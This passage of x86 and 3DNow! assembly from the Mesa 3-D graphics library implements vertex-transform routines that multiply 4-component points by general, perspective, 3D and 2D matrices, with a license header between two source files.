PFADD ( MM6, MM4 ) /* x1*m11+x3*m31 | x0*m00+x3*m30 */
ADD_L ( CONST(16), EDX ) /* next r */
MOVQ ( MM4, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3NRR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_2d
 * 3DNow! 2D transform of 4-component points:
 *   r0 = x*m00 + y*m10 + w*m30 ; r1 = x*m01 + y*m11 + w*m31
 *   r2, r3 copied unchanged from the source (z, w).
 * Hoisted terms: MM0 = m10|m00, MM1 = m11|m01, MM2 = m31|m30.
 * Clobbers: MM0-MM6 (FEMMS on exit), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_2d )
HIDDEN(_mesa_3dnow_transform_points4_2d)
GLNAME( _mesa_3dnow_transform_points4_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_2 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM3 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM3, MM4 ) /* x1 | x0 */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
PFMUL ( MM1, MM4 ) /* x1*m11 | x0*m01 */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( MM0, MM3 ) /* x1*m10 | x0*m00 */
ADD_L ( CONST(16), EDX ) /* next r */
PFACC ( MM4, MM3 ) /* x0*m01+x1*m11 | x0*m00+x1*m10 */
PFMUL ( MM2, MM6 ) /* x3*m31 | x3*m30 */
PFADD ( MM6, MM3 ) /* r1 | r0 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
MOVQ ( MM3, REGOFF(-16, EDX) ) /* write r0, r1 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_2d_no_rot
 * 3DNow! 2D transform of 4-component points, no rotational part:
 *   r0 = x*m00 + w*m30 ; r1 = y*m11 + w*m31
 *   r2, r3 copied unchanged from the source (z, w).
 * Hoisted terms: MM0 = m11|m00, MM1 = m31|m30.
 * Clobbers: MM0, MM1, MM4-MM6 (FEMMS on exit), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points4_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points4_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_2 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
ADD_L ( CONST(16), EDX ) /* next r */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( MM1, MM6 ) /* x3*m31 | x3*m30 */
PFADD ( MM4, MM6 ) /* x1*m11+x3*m31 | x0*m00+x3*m30 */
MOVQ ( MM6, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
/*-----------------------------------------------------------------------
 * _mesa_3dnow_transform_points4_identity
 * Identity transform: copies all four source components to dest via
 * two MOVQs per vertex.  The matrix pointer is loaded but never read.
 * Sets dest size=4, flags |= VEC_SIZE_4, count = source count.
 * Clobbers: MM0, MM1 (FEMMS on exit), EAX, ECX, EDX.
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_identity )
HIDDEN(_mesa_3dnow_transform_points4_identity)
GLNAME( _mesa_3dnow_transform_points4_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_2 ) )
ALIGNTEXT16
LLBL( G3TPIR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM1 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
ADD_L ( CONST(16), EDX ) /* next r */
MOVQ ( MM0, REGOFF(-16, EDX) ) /* r1 | r0 */
MOVQ ( MM1, REGOFF(-8, EDX) ) /* r3 | r2 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPIR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 14,675
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_xform4.S
|
/* $Id: x86_xform4.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
/* IEEE-754 single-precision bit patterns, stored with integer MOVs:
 * 1065353216 == 0x3F800000 == 1.0f */
#define FP_ONE 1065353216
#define FP_ZERO 0
/* Source vertex components: ESI points at the current source vertex */
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
/* Destination vertex components: EDI points at the current dest vertex */
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
/* Matrix elements: EDX points at 16 consecutive floats m0..m15.
 * The transforms below compute dst[i] = sum_j src[j]*m[4j+i]. */
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
#define MAT4 REGOFF(16, EDX)
#define MAT5 REGOFF(20, EDX)
#define MAT6 REGOFF(24, EDX)
#define MAT7 REGOFF(28, EDX)
#define MAT8 REGOFF(32, EDX)
#define MAT9 REGOFF(36, EDX)
#define MAT10 REGOFF(40, EDX)
#define MAT11 REGOFF(44, EDX)
#define MAT12 REGOFF(48, EDX)
#define MAT13 REGOFF(52, EDX)
#define MAT14 REGOFF(56, EDX)
#define MAT15 REGOFF(60, EDX)
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points4_general
 * x87 full 4x4 transform of 4-component points:
 *   dst[i] = x*m[i] + y*m[4+i] + z*m[8+i] + w*m[12+i]   for i = 0..3
 * Processes the products in three groups of four (x/y rows, then the z
 * row, then the w row), folding each group into the running totals
 * F4..F7 with FADDP before loading the next.
 * Sets dest size=4, flags |= VEC_SIZE_4, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_general )
HIDDEN(_mesa_x86_transform_points4_general)
GLNAME( _mesa_x86_transform_points4_general ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_gr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_gr_loop):
/* group 1: x*m0..m3 and y*m4..m7 */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC0 ) /* F7 F6 F5 F4 */
FMUL_S( MAT3 )
FLD_S( SRC1 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT6 )
FLD_S( SRC1 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT7 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
/* group 2: accumulate z*m8..m11 */
FLD_S( SRC2 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT10 )
FLD_S( SRC2 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT11 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
/* group 3: accumulate w*m12..m15 */
FLD_S( SRC3 ) /* F0 F7 F6 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT13 )
FLD_S( SRC3 ) /* F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT14 )
FLD_S( SRC3 ) /* F3 F2 F1 F0 F7 F6 F5 F4 */
FMUL_S( MAT15 )
FXCH( ST(3) ) /* F0 F2 F1 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(7) ) /* F2 F1 F3 F7 F6 F5 F4 */
FXCH( ST(1) ) /* F1 F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F2 F3 F7 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F3 F7 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F7 F6 F5 F4 */
FXCH( ST(3) ) /* F4 F6 F5 F7 */
FSTP_S( DST0 ) /* F6 F5 F7 */
FXCH( ST(1) ) /* F5 F6 F7 */
FSTP_S( DST1 ) /* F6 F7 */
FSTP_S( DST2 ) /* F7 */
FSTP_S( DST3 ) /* */
LLBL(x86_p4_gr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_gr_loop) )
LLBL(x86_p4_gr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points4_perspective
 * Transform 4-component points by a perspective-projection matrix:
 *   dst[0] = x*m0 + z*m8  ; dst[1] = y*m5 + z*m9
 *   dst[2] = z*m10 + w*m14 ; dst[3] = -z
 * dst[3] is produced without the FPU: the raw bits of z are loaded
 * into EBX and the sign bit flipped with XOR 0x80000000.
 * Sets dest size=4, flags |= VEC_SIZE_4, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (EBX/ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_perspective )
HIDDEN(_mesa_x86_transform_points4_perspective)
GLNAME( _mesa_x86_transform_points4_perspective ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_pr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_pr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F0 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F6 F1 F0 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F6 F5 F4 */
FADDP( ST0, ST(4) ) /* F1 F6 F5 F4 */
FADDP( ST0, ST(2) ) /* F6 F5 F4 */
FLD_S( SRC3 ) /* F2 F6 F5 F4 */
FMUL_S( MAT14 )
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC2, EBX )
XOR_L( CONST(-2147483648), EBX )/* change sign */
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p4_pr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_pr_loop) )
LLBL(x86_p4_pr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*-----------------------------------------------------------------------
 * _mesa_x86_transform_points4_3d
 * Transform 4-component points by a 3D matrix (last matrix column
 * assumed 0,0,0,1):
 *   dst[i] = x*m[i] + y*m[4+i] + z*m[8+i] + w*m[12+i]  for i = 0..2
 *   dst[3] = w  (copied bitwise through EBX, no FPU round-trip)
 * Sets dest size=4, flags |= VEC_SIZE_4, count = source count.
 * Clobbers: EAX, ECX, EDX, x87 stack (EBX/ESI/EDI saved).
 *---------------------------------------------------------------------*/
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_3d )
HIDDEN(_mesa_x86_transform_points4_3d)
GLNAME( _mesa_x86_transform_points4_3d ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_3dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_3dr_loop):
/* group 1: x*m0..m2 and y*m4..m6 */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC0 ) /* F6 F5 F4 */
FMUL_S( MAT2 )
FLD_S( SRC1 ) /* F0 F6 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC1 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT6 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
/* group 2: accumulate z*m8..m10 */
FLD_S( SRC2 ) /* F0 F6 F5 F4 */
FMUL_S( MAT8 )
FLD_S( SRC2 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT9 )
FLD_S( SRC2 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT10 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
/* group 3: accumulate w*m12..m14 */
FLD_S( SRC3 ) /* F0 F6 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT13 )
FLD_S( SRC3 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT14 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
MOV_L( SRC3, EBX )
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p4_3dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_3dr_loop) )
LLBL(x86_p4_3dr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_x86_transform_points4_3d_no_rot
 * x87 transform for a scale+translate (no rotation) matrix: only the
 * diagonal m0/m5/m10 and the translation m12/m13/m14 are read.
 * Source W is copied through unchanged to dest W via EBX.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel, EBX = scratch (callee-saved).
 */
ALIGNTEXT16
GLOBL GLNAME(_mesa_x86_transform_points4_3d_no_rot)
HIDDEN(_mesa_x86_transform_points4_3d_no_rot)
GLNAME(_mesa_x86_transform_points4_3d_no_rot):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_3dnrr_done) )
/* set up the dest vector header and compute the loop end pointer */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_3dnrr_loop):
/* x*m0, y*m5, z*m10, then add w-scaled translation m12..m14 */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC2 ) /* F6 F5 F4 */
FMUL_S( MAT10 )
FLD_S( SRC3 ) /* F0 F6 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F6 F5 F4 */
FMUL_S( MAT13 )
FLD_S( SRC3 ) /* F2 F1 F0 F6 F5 F4 */
FMUL_S( MAT14 )
FXCH( ST(2) ) /* F0 F1 F2 F6 F5 F4 */
FADDP( ST0, ST(5) ) /* F1 F2 F6 F5 F4 */
FADDP( ST0, ST(3) ) /* F2 F6 F5 F4 */
FADDP( ST0, ST(1) ) /* F6 F5 F4 */
/* pass source w straight through as an integer */
MOV_L( SRC3, EBX )
FXCH( ST(2) ) /* F4 F5 F6 */
FSTP_S( DST0 ) /* F5 F6 */
FSTP_S( DST1 ) /* F6 */
FSTP_S( DST2 ) /* */
MOV_L( EBX, DST3 )
LLBL(x86_p4_3dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_3dnrr_loop) )
LLBL(x86_p4_3dnrr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_x86_transform_points4_2d
 * x87 transform for a 2D matrix: only m0/m1, m4/m5 and the
 * translation m12/m13 are read.  Source Z and W are copied through
 * unchanged as raw 32-bit integers via EBX/EBP (hence the extra
 * EBP push and FRAME_OFFSET of 16).
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel, EBX/EBP = scratch (callee-saved).
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_2d )
HIDDEN(_mesa_x86_transform_points4_2d)
GLNAME( _mesa_x86_transform_points4_2d ):
#define FRAME_OFFSET 16
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
PUSH_L( EBP )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_2dr_done) )
/* set up the dest vector header and compute the loop end pointer */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_2dr_loop):
/* x' = x*m0 + y*m4 + w*m12,  y' = x*m1 + y*m5 + w*m13 */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC1 ) /* F0 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F5 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
FLD_S( SRC3 ) /* F0 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F5 F4 */
FMUL_S( MAT13 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
/* pass source z and w straight through as integers */
MOV_L( SRC2, EBX )
MOV_L( SRC3, EBP )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
MOV_L( EBP, DST3 )
LLBL(x86_p4_2dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_2dr_loop) )
LLBL(x86_p4_2dr_done):
POP_L( EBP )
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_x86_transform_points4_2d_no_rot
 * x87 transform for a 2D scale+translate matrix: only m0, m5, m12
 * and m13 are read.  Source Z and W are copied through unchanged as
 * raw 32-bit integers via EBX/EBP.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel, EBX/EBP = scratch (callee-saved).
 */
